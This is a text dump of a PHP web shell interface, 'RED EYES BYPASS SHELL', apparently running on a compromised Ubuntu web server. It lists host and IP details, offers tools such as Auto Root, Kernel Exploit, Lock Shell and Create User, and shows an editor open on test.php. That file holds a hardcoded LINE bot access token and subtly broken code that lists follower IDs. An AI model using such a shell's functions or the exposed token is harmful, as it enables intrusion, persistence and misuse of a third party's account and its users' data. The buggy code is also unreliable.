Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
pr /
hook /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
test.php
1.02
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : test.php
<?php // ตั้งค่าตัวแปร $channelAccessToken = "B5nRlkyF//iu5zAmL+SVUBhj+7DaGcRgTVEPjWyle1/zDnnyM5qDSQdb2vbcvVqGR4L8UChDyIVjAiew+NKC/jmOx5rlfyFDyfb6HONody0/3yZbvsXt/hJ8I7bzMwQMVr8Chjs3u1dZ4UpLJTpbtQdB04t89/1O/w1cDnyilFU="; // เรียกใช้งาน API $url = "https://api.line.me/v2/bot/followers/ids"; $headers = [ "Authorization: Bearer $channelAccessToken", ]; $response = curl_get($url, $headers); // ตรวจสอบสถานะ if ($response === 200) { // แปลงผลลัพธ์เป็น JSON $data = json_decode($response, true); // แสดง YOUR_USER_ID foreach ($data["userIds"] as $userId) { echo $userId . "\n"; } } else { echo "ส่งข้อความล้มเหลว"; } function curl_get($url, $headers) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $response = curl_exec($ch); curl_close($ch); return $response; } ?>
Close